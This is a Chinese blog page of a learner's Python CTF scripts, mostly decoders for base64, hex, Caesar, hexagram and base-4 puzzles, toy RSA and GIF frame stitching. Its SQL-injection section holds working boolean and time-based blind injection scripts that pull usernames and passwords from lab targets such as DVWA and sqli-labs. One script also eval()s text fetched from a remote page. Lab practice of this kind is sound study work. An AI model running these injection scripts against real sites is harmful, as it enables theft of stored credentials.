IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> python 写的一些ctf脚本 -> 正文阅读

[网络协议]python 写的一些ctf脚本

python 写的一些ctf题脚本记录

misc

import base64
c = base64.b64decode("XlNkVmtUI1MgXWBZXCFeKY+AaXNt")
for i in c:
    print(chr((i-16) ^ 32), end="")
import base64
str = "JiM3NjsmIzEyMjsmIzY5OyYjMTIwOyYjNzk7JiM4MzsmIzU2OyYjMTIwOyYjNzc7JiM2ODsmIzY5OyYjMTE4OyYjNzc7JiM4NDsmIzY1OyYjNTI7JiM3NjsmIzEyMjsmIzEwNzsmIzUzOyYjNzY7JiMxMjI7JiM2OTsmIzEyMDsmIzc3OyYjODM7JiM1NjsmIzEyMDsmIzc3OyYjNjg7JiMxMDc7JiMxMTg7JiM3NzsmIzg0OyYjNjU7JiMxMjA7JiM3NjsmIzEyMjsmIzY5OyYjMTIwOyYjNzg7JiMxMDU7JiM1NjsmIzEyMDsmIzc3OyYjODQ7JiM2OTsmIzExODsmIzc5OyYjODQ7JiM5OTsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzUwOyYjNzY7JiMxMjI7JiM2OTsmIzEyMDsmIzc4OyYjMTA1OyYjNTY7JiM1MzsmIzc4OyYjMTIxOyYjNTY7JiM1MzsmIzc5OyYjODM7JiM1NjsmIzEyMDsmIzc3OyYjNjg7JiM5OTsmIzExODsmIzc5OyYjODQ7JiM5OTsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzExOTsmIzc2OyYjMTIyOyYjNjk7JiMxMTk7JiM3NzsmIzY3OyYjNTY7JiMxMjA7JiM3NzsmIzY4OyYjNjU7JiMxMTg7JiM3NzsmIzg0OyYjNjU7JiMxMjA7JiM3NjsmIzEyMjsmIzY5OyYjMTE5OyYjNzc7JiMxMDU7JiM1NjsmIzEyMDsmIzc3OyYjNjg7JiM2OTsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzExOTsmIzc2OyYjMTIyOyYjMTA3OyYjNTM7JiM3NjsmIzEyMjsmIzY5OyYjMTE5OyYjNzc7JiM4MzsmIzU2OyYjMTIwOyYjNzc7JiM4NDsmIzEwNzsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzEyMDsmIzc2OyYjMTIyOyYjNjk7JiMxMjA7JiM3ODsmIzY3OyYjNTY7JiMxMjA7JiM3NzsmIzY4OyYjMTAzOyYjMTE4OyYjNzc7JiM4NDsmIzY1OyYjMTE5Ow=="
b_str = base64.b64decode(str.encode("utf-8"))

s = b_str.decode()
l = s.replace("&#", "")[0:-1].split(";")

new_s = ''
for i in l:
    new_s += chr(int(i))

b_str = base64.b64decode(new_s.encode("utf-8"))

s = b_str.decode()
l = s[1:].split("/")

new_s = ''
for i in l:
    new_s += chr(int(i))
print(new_s)
import base64
s = '升益艮归妹井萃旅离旅困未济屯未济中孚未济升困噬嗑鼎震巽噬嗑解节井萃离未济蒙归妹大畜无妄解兑临睽升睽未济无妄遁涣归妹'
dic = {'坤': '000000', '剥': '000001', '比': '000010', '观': '000011', '豫': '000100', '晋': '000101', '萃': '000110', '否': '000111', '谦': '001000', '艮': '001001', '蹇': '001010', '渐': '001011', '小过': '001100', '旅': '001101', '咸': '001110', '遁': '001111', '师': '010000', '蒙': '010001', '坎': '010010', '涣': '010011', '解': '010100', '未济': '010101', '困': '010110', '讼': '010111', '升': '011000', '蛊': '011001', '井': '011010', '巽': '011011', '恒': '011100', '鼎': '011101', '大过': '011110', '姤': '011111',
       '复': '100000', '颐': '100001', '屯': '100010', '益': '100011', '震': '100100', '噬嗑': '100101', '随': '100110', '无妄': '100111', '明夷': '101000', '贲': '101001', '既济': '101010', '家人': '101011', '丰': '101100', '离': '101101', '革': '101110', '同人': '101111', '临': '110000', '损': '110001', '节': '110010', '中孚': '110011', '归妹': '110100', '睽': '110101', '兑': '110110', '履': '110111', '泰': '111000', '大畜': '111001', '需': '111010', '小畜': '111011', '大壮': '111100', '大有': '111101', '夬': '111110', '乾': '111111'}
l = []
k = 0  # 两个字符的标志位
for i in range(len(s)):
    if k == 1:
        k = 0
        continue
    try:
        l.append(dic[s[i]])
    except:
        l.append(dic[s[i]+s[i+1]])
        k = 1

ss = ''.join(l)

# print(ss)

enc = ''
for i in range(0, len(ss), 8):
    enc += chr(eval('0b'+ss[i:i+8]))

# print(enc)

s = base64.b64decode(enc).decode()

# print(s)


def encrypt4(enc):
    temp = ''
    offset = 5
    for i in range(len(enc)):
        temp += chr(ord(enc[i])-offset-i)
    return(temp)


def decrypt4(enc):
    temp = ''
    offset = 5
    for i in range(len(enc)):
        temp += chr(ord(enc[i])+offset+i)
    return(temp)


a, b = 5, 7


def encrpyt5(flag):
    enc = ''
    for i in flag:
        enc += chr((a*(ord(i)-97)+b) % 26+97)
    return(enc)


def decrypt5(flag):
    enc = ''
    for i in flag:
        for k in range(20):
            if (ord(i) - 97 - b+26*k) % a == 0:
                enc += chr((ord(i) - 97 - b + 26 * k) // a + 97)
                break
    return(enc)


print(decrypt5(decrypt4(s)))

16进制

str = "61666374667B317327745F73305F333435797D"
for i in range(0, len(str), 2):
    print(chr(int("0x"+str[i:i+2], 16)), end="")
str = "0x00000039      0x00000034      0x00000034      0x00000037 0x0000007b      0x00000079      0x0000006f      0x00000075 0x0000005f      0x00000061      0x00000072      0x00000065 0x0000005f      0x00000061      0x0000006e      0x0000005f 0x00000069      0x0000006e      0x00000074      0x00000065 0x00000072      0x0000006e      0x00000061      0x00000074 0x00000069      0x0000006f      0x0000006e      0x00000061 0x0000006c      0x0000005f      0x0000006d      0x00000079 0x00000073      0x00000074      0x00000065      0x00000072 0x00000079      0x0000007d"
for i in str.split():
    print(chr(int(i, 16)), end="")

凯撒

from Crypto.Util.number import *

str = 16074357572745018593418837326290993512421736655307780242162599660198598253230550168811761868953242350136362894008095983571749530656901163555918436741973772511575306
passwd = long_to_bytes(str)
# Guvf vf gur cnffjbeq lbh arrq sbe gur MVC svyr: synt{efnZ0erQ33crE}
str = passwd.decode()


def change(key, str):
    result = ""
    for i in str:
        if (i.islower()):
            if((ord(i)+key) > 122):
                result += chr(ord(i)+key-26)
            else:
                result += chr(ord(i)+key)
        elif(i.isupper()):
            if((ord(i)+key) > 90):
                result += chr(ord(i)+key-26)
            else:
                result += chr(ord(i)+key)
        else:
            result += i
    return result

for i in range(26):
    print(change(i, str))

import base64
str = "CpakC3wpCpCpOZCpCpBwCpCpCl1pCpCpiT=="


def change(key, str):
    result = ""
    for i in str:
        if (i.islower()):
            if((ord(i)+key) > 122):
                result += chr(ord(i)+key-26)
            else:
                result += chr(ord(i)+key)
        elif(i.isupper()):
            if((ord(i)+key) > 90):
                result += chr(ord(i)+key-26)
            else:
                result += chr(ord(i)+key)
        else:
            result += i
    return result


for i in range(26):
    base_str = change(i, str)
    try:
        s=base64.b64decode(base_str)
        print(s.decode())
    except:
        pass

4进制

str = "1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331"
print("".join([chr(int(i, 4)) for i in str.split()]))

置换密码

import base64

str = "Lrg|{R6{{QQ%O@pOjkiuP*YDuL_tzgNkvpePEu2SNlsKp"
str = base64.b85decode(str).decode()   # CLF{TCAASISCLWASPSOEDARRIETENRS}INTG
l = [str[i:i+6] for i in range(0, len(str), 6)]
print("".join([i[0]+i[4]+i[2]+i[3]+i[5]+i[1] for i in l]))

Unicode

str = "0066006c00610067007b964452a096905199007d"
print("".join(["\\u"+str[i:i+4] for i in range(0, len(str), 4)]))

print(u'\u0066\u006c\u0061\u0067\u007b\u9644\u52a0\u9690\u5199\u007d')

web计算

import requests
from lxml import etree
url = "https://1360-b7e729ae-1747-44c2-bb53-e5f037516e48.do-not-trust.hacking.run/"

s = requests.Session()
r = s.get(url)
data = r.content.decode()
html = etree.HTML(data)

str = html.xpath("//p/text()")[1]

payload = {'result': eval(str), 'submit': '提交'}
r = s.post(url, data=payload)
print(r.text)

rsa

import gmpy2

e = 13
p = 7
q = 11

m = 71  # 明文

n = p * q
phi = (p-1)*(q-1)  # 求φ(n)
d = gmpy2.invert(e, phi)  # 解密指数d

c = pow(m, e, n)  # c = m^e mod n

print(c)  # 15

import gmpy2

e = 13
p = 7
q = 11

c = 15  # 密文

n = p * q
phi = (p-1)*(q-1)  # 求φ(n)
d = gmpy2.invert(e, phi)  # 解密指数d

m = pow(c, d, n)  # m = c^d mod n

print(m)  # 71

base64实现

l = "A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 + /".split()

ll = []
for i in range(len(l)):
    t = bin(i)[2:]
    if(len(t) != 6):
        t = "0"*(6-len(t))+t
    ll.append(t)

d = {}
for i in range(len(l)):
    d[l[i]] = ll[i]


def xiao_e_base64(str):
    b_str = ""
    temp = ""
    for i in str:
        b = bin(ord(i))[2:]
        if(len(b) != 8):
            b_str += "0"*(8-len(b))+b
        else:
            b_str += b

    f = len(b_str) % 3
    b_str += "000000"*f

    str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    for i in range(0, len(b_str), 6):
        if("1" in b_str[i:i+6]):
            temp += str[int(b_str[i:i+6], 2)]
    return temp+"="*f


def xiao_d_base64(str):

    b_str = ""
    temp = ""
    for i in str:
        if(i == "="):
            b_str += "000000"
        else:
            b_str += d[i]

    for i in range(0, len(b_str), 8):
        temp += chr(int(b_str[i:i+8], 2))
    return temp


print(xiao_e_base64("Tr0y3uew"))
print(xiao_d_base64("VHIweTN1ZXc="))

sql注入布尔

import requests

url = "http://xiu.com/sqli/Less-5/?id=1"

is_ture = "You are in......"

for x in range(1, 100):
    r = requests.get(
        url+f"'and (select count(concat(username,'@',password)) from users)={x} -- +")
    if(is_ture in r.text):
        break
for j in range(0, x):
    for length in range(1, 100):
        r = requests.get(
            url+f"'and (select length(concat(username,'@',password)) from users limit {j},1)={length} -- +")
        if(is_ture in r.text):
            break
    for k in range(1, length+1):
        min = 32
        max = 127
        while abs(max - min) > 1:
            mid = (max + min)//2
            r = requests.get(url+f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))>{mid} -- +")
            if(is_ture in r.text):
                min = mid
            else:
                max = mid
        print(chr(max), end="")
    print()

import requests
url = "http://xiu.com/DVWA/vulnerabilities/sqli_blind/?id=1"
suffix = "&Submit=Submit#"

is_ture = "User ID exists in the database."

table = "users"
columns1 = "first_name"
columns2 = "password"

cookies = 'security=low; bdshare_firstime=1638626761530; PHPSESSID=h6aumin31bcur15esl4o64ju61'
cookie = {cookie.split("=")[0]: cookie.split("=")[1] for cookie in cookies.split(";")}

for x in range(1, 100):
    payload = f"'and (select count(concat({columns1},'@',{columns2})) from {table})={x} -- +{suffix}"
    r = requests.get(url+payload, cookies=cookie)
    if(is_ture in r.text):
        break
for j in range(0, x):
    for length in range(1, 100):
        payload = f"'and (select length(concat({columns1},'@',{columns2})) from {table} limit {j},1)={length} -- +{suffix}"
        r = requests.get(url+payload, cookies=cookie)
        if(is_ture in r.text):
            break
    for k in range(1, length+1):
        min = 32
        max = 127
        while abs(max - min) > 1:
            mid = (max + min)//2
            payload = f"' and ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {j},1),{k},1))>{mid} -- +{suffix}"
            r = requests.get(url+payload, cookies=cookie)
            if(is_ture in r.text):
                min = mid
            else:
                max = mid
        print(chr(max), end="")
    print()


import requests

url = "http://xiu.com/sqli/Less-5/?id=1"

chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'
is_ture = "You are in......"

for x in range(1, 100):
    r = requests.get( url+f"'and (select count(concat(username,'@',password)) from users)={x} -- +")
    if(is_ture in r.text):
        break
for j in range(0, x):
    for length in range(1, 100):
        r = requests.get( url+f"'and (select length(concat(username,'@',password)) from users limit {j},1)={length} -- +")
        if(is_ture in r.text):
            break
    for k in range(1, length+1):
        for i in chars:
            r = requests.get(url+f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))={ord(i)} -- +")
            if(is_ture in r.text):
                print(i, end="")
                break
    print()

import requests
from time import time
url = "http://xiu.com/sqli/Less-5/?id=1"

chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'


for x in range(1, 100):
    t1=time()
    r = requests.get(url+f"'and if((select count(concat(username,'@',password)) from users)={x},sleep(1),1) -- +")
    t2=time()
    if((t2-t1)>1):
        break

for j in range(0, x):
    for length in range(1, 100):
        t1 = time()
        r = requests.get(url+f"'and if((select length(concat(username,'@',password)) from users limit {j},1)={length},sleep(1),1) -- +")
        t2 = time()
        if((t2-t1) > 1):
            break
    for k in range(1, length+1):
        for i in chars:
            t1 = time()
            r = requests.get( url+f"' and if(ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))={ord(i)},sleep(1),1) -- +")
            t2 = time()
            if((t2-t1) > 1):
                print(i, end="")
                break
    print()

import requests
from time import time

url = "http://xiu.com/pikachu/vul/sqli/sqli_blind_b.php?name=vince"
suffix = "&submit=%E6%9F%A5%E8%AF%A2"

sleep_time = 0.5

table = "users"
columns1 = "username"
columns2 = "password"


cookies = '='
cookie = {cookie.split("=")[0]: cookie.split("=")[1] for cookie in cookies.split(";")}

for x in range(1, 100):
    t1 = time()
    payload = f"'and if((select count(concat({columns1},'@',{columns2})) from {table})={x},sleep({sleep_time}),1) -- +{suffix}"
    r = requests.get(url+payload, cookies=cookie)
    t2 = time()
    if((t2-t1) > sleep_time):
        break

for j in range(0, x):
    for length in range(5, 100):
        t1 = time()
        payload = f"'and if((select length(concat({columns1},'@',{columns2})) from {table} limit {j},1)={length},sleep({sleep_time}),1) -- +{suffix}"
        r = requests.get(url+payload, cookies=cookie)
        t2 = time()
        if((t2-t1) > sleep_time):
            break
    for k in range(1, length+1):
        min = 32
        max = 127
        while abs(max - min) > 1:
            mid = (max + min)//2
            t1 = time()
            payload = f"' and if(ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {j},1),{k},1))>{mid},sleep({sleep_time}),1) -- +{suffix}"
            r = requests.get(url+payload, cookies=cookie)
            t2 = time()
            # print(url+payload)
            if((t2-t1) > sleep_time):
                min = mid
            else:
                max = mid
        print(chr(max), end="")
    print()

gif图片帧拼接

from PIL import Image

im = Image.open('file.gif')

# 分离
for i in range(770):
    # 在给定的文件序列中查找指定的帧。如果查找超越了序列的末尾,则产生一个EOFError异常。
    # 当文件序列被打开时,PIL库自动指定到第0帧上。
    im.seek(i)
    im.save('123/'+str(i)+'.png') # 保存在123的目录中

new_one = Image.new('RGB', (770, 432))

# 拼接
for j in range(770):
    ima = Image.open('123/'+str(j)+'.png') # 打开123目录
    # 将一张图粘贴到另一张图像上。变量box或者是一个给定左上角的2元组,或者是定义了左,上,右和下像素坐标的4元组,或者为空(与(0,0)一样)。
    # 如果给定4元组,被粘贴的图像的尺寸必须与区域尺寸一样。如果模式不匹配,被粘贴的图像将被转换为当前图像的模式。
    new_one.paste(ima, (j, 0, j+1, 432))

# 保存
new_one.save("flag.png")












  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-04-09 18:53:50  更:2022-04-09 18:56:06 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/31 3:21:58-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码